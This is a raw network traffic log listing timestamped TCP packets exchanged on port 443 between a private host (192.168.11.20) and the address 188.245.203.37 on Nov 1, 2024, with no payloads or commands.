Nov 1, 2024 20:58:24.912189007 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:24.912373066 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:24.912373066 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:24.912373066 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:24.912374020 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:24.912425995 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:24.912600994 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:24.928730965 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:24.928759098 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:24.928991079 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:24.928991079 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:24.928991079 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:24.928991079 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:24.929024935 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:24.929038048 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:24.929266930 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:24.942688942 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:24.942715883 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:24.942949057 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:24.942950010 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:24.942979097 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:24.942979097 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:24.942994118 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:24.943226099 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:24.957802057 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:24.957828999 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:24.958060026 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:24.958060026 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:24.958338022 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:24.958362103 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:24.958570957 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:24.970377922 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:24.970405102 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:24.970566034 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:24.970834017 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:24.970858097 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:24.971208096 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:24.982706070 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:24.982732058 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:24.982902050 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:24.983177900 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:24.983202934 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:24.983494043 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:24.996287107 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:24.996313095 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:24.996531963 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:24.996531963 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:24.996557951 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:24.996743917 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:24.996963024 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:25.008646011 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:25.008703947 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:25.009037018 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:25.009037018 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:25.009037018 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:25.009094954 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:25.009233952 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:25.009427071 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:25.019424915 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:25.019481897 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:25.019823074 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:25.019823074 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:25.019877911 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:25.019978046 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:25.020169020 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:25.031886101 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:25.031941891 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:25.032059908 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:25.032279015 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:25.032279015 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:25.032279015 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:25.032279015 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:25.032345057 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:25.032581091 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:25.041692972 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:25.041765928 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:25.041960955 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:25.041960955 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:25.041960955 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:25.042025089 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:25.042125940 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:25.042318106 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:25.042318106 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:25.052170992 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:25.052227974 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:25.052566051 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:25.052566051 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:25.052762985 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:25.052763939 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:25.052763939 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:25.052820921 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:25.053006887 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:25.061400890 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:25.061475992 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:25.061657906 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:25.061657906 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:25.061794043 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:25.061794043 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:25.061794043 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:25.061794996 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:25.061826944 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:25.062036037 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:25.071913004 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:25.071997881 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:25.072089911 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:25.072277069 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:25.072277069 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:25.072278023 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:25.072278023 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:25.072340965 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:25.072674036 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:25.080553055 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:25.080611944 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:25.080801964 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:25.080801964 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:25.080801964 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:25.081001043 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:25.081052065 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:25.081233978 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:25.089606047 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:25.089664936 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:25.089842081 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:25.089843035 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:25.090042114 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:25.090042114 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:25.090042114 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:25.090042114 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:25.090106010 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:25.090292931 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:25.098906040 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:25.098964930 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:25.099301100 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:25.099301100 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:25.099364996 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:25.099726915 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:25.106594086 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:25.106651068 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:25.106854916 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:25.106854916 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:25.106914043 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:25.107032061 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:25.107032061 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:25.107180119 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:25.114044905 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:25.114101887 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:25.114430904 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:25.114432096 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:25.114491940 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:25.114831924 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:25.121917009 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:25.121973991 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:25.122140884 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:25.122358084 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:25.122409105 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:25.122662067 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:25.129771948 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:25.129829884 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:25.129997015 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:25.129997015 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:25.130058050 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:25.130208015 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:25.130208969 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:25.130398989 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:25.136542082 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:25.136599064 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:25.136749983 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:25.136948109 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:25.136948109 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:25.136948109 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:25.137003899 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:25.137243032 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:25.144181967 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:25.144241095 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:25.144406080 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:25.144406080 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:25.144620895 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:25.144671917 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:25.144807100 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:25.144808054 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:25.144856930 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:25.151210070 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:25.151266098 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:25.151459932 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:25.151459932 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:25.151648045 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:25.151648998 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:25.151702881 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:25.151895046 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:25.157387972 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:25.157447100 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:25.157605886 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:25.157605886 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:25.157605886 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:25.157607079 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:25.157675982 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:25.157783985 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:25.157783985 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:25.157970905 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:25.163022041 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:25.163079977 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:25.163191080 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:25.163383007 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:25.163383007 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:25.163383007 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:25.163429022 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:25.163616896 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:25.168900967 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:25.169048071 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:25.169087887 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:25.169195890 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:25.169195890 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:25.169368982 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:25.169574022 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:25.169619083 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:25.169985056 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:25.170066118 CET	443	58986	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:25.170295954 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:25.170454025 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:25.170511007 CET	443	58986	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:25.546736002 CET	443	58986	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:25.546890020 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:25.547199965 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:25.547235966 CET	443	58986	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:25.548361063 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:25.548407078 CET	443	58986	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:26.141557932 CET	443	58986	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:26.141640902 CET	443	58986	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:26.141716003 CET	443	58986	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:26.141766071 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:26.141871929 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:26.141901016 CET	443	58986	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:26.141942024 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:26.142087936 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:26.223589897 CET	443	58986	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:26.223647118 CET	443	58986	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:26.223752022 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:26.223752022 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:26.223798037 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:26.223911047 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:26.223942041 CET	443	58986	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:26.224138975 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:26.342988014 CET	443	58986	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:26.343044996 CET	443	58986	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:26.343203068 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:26.343203068 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:26.343333960 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:26.343368053 CET	443	58986	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:26.343394995 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:26.343548059 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:26.425945044 CET	443	58986	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:26.426001072 CET	443	58986	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:26.426214933 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:26.426258087 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:26.426258087 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:26.426290989 CET	443	58986	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:26.426572084 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:26.673511028 CET	443	58986	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:26.673531055 CET	443	58986	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:26.673671007 CET	443	58986	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:26.673755884 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:26.673755884 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:26.673823118 CET	443	58986	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:26.673969030 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:26.674026012 CET	443	58986	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:26.674065113 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:26.674181938 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:26.674238920 CET	443	58986	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:26.674258947 CET	443	58986	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:26.674289942 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:26.674314022 CET	443	58986	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:26.674360037 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:26.674612045 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:26.674665928 CET	443	58986	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:26.674685001 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:26.675065994 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:26.691484928 CET	443	58986	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:26.691545963 CET	443	58986	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:26.691682100 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:26.691682100 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:26.691750050 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:26.691750050 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:26.691797972 CET	443	58986	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:26.691838026 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:26.691838026 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:26.692169905 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:26.733747005 CET	443	58986	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:26.733804941 CET	443	58986	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:26.733915091 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:26.734092951 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:26.734134912 CET	443	58986	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:26.734152079 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:26.734272003 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:26.769182920 CET	443	58986	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:26.769239902 CET	443	58986	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:26.769445896 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:26.769500971 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:26.769578934 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:26.769578934 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:26.769639015 CET	443	58986	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:26.769659042 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:26.769659042 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:26.769712925 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:26.769843102 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:26.802581072 CET	443	58986	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:26.802638054 CET	443	58986	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:26.802859068 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:26.802912951 CET	443	58986	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:26.802947044 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:26.803092957 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:26.837651968 CET	443	58986	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:26.837707996 CET	443	58986	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:26.837896109 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:26.837950945 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:26.837984085 CET	443	58986	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:26.838077068 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:26.838243008 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:26.860527992 CET	443	58986	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:26.860584974 CET	443	58986	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:26.860707998 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:26.860707998 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:26.860774994 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:26.860949039 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:26.861001015 CET	443	58986	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:26.861277103 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:26.884483099 CET	443	58986	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:26.884541035 CET	443	58986	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:26.884646893 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:26.884708881 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:26.884738922 CET	443	58986	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:26.884845018 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:26.885009050 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:26.900819063 CET	443	58986	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:26.900878906 CET	443	58986	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:26.901051044 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:26.901051044 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:26.901112080 CET	443	58986	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:26.901140928 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:26.901185989 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:26.901309967 CET	58986	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:26.917685986 CET	443	58986	188.245.203.37	192.168.11.20
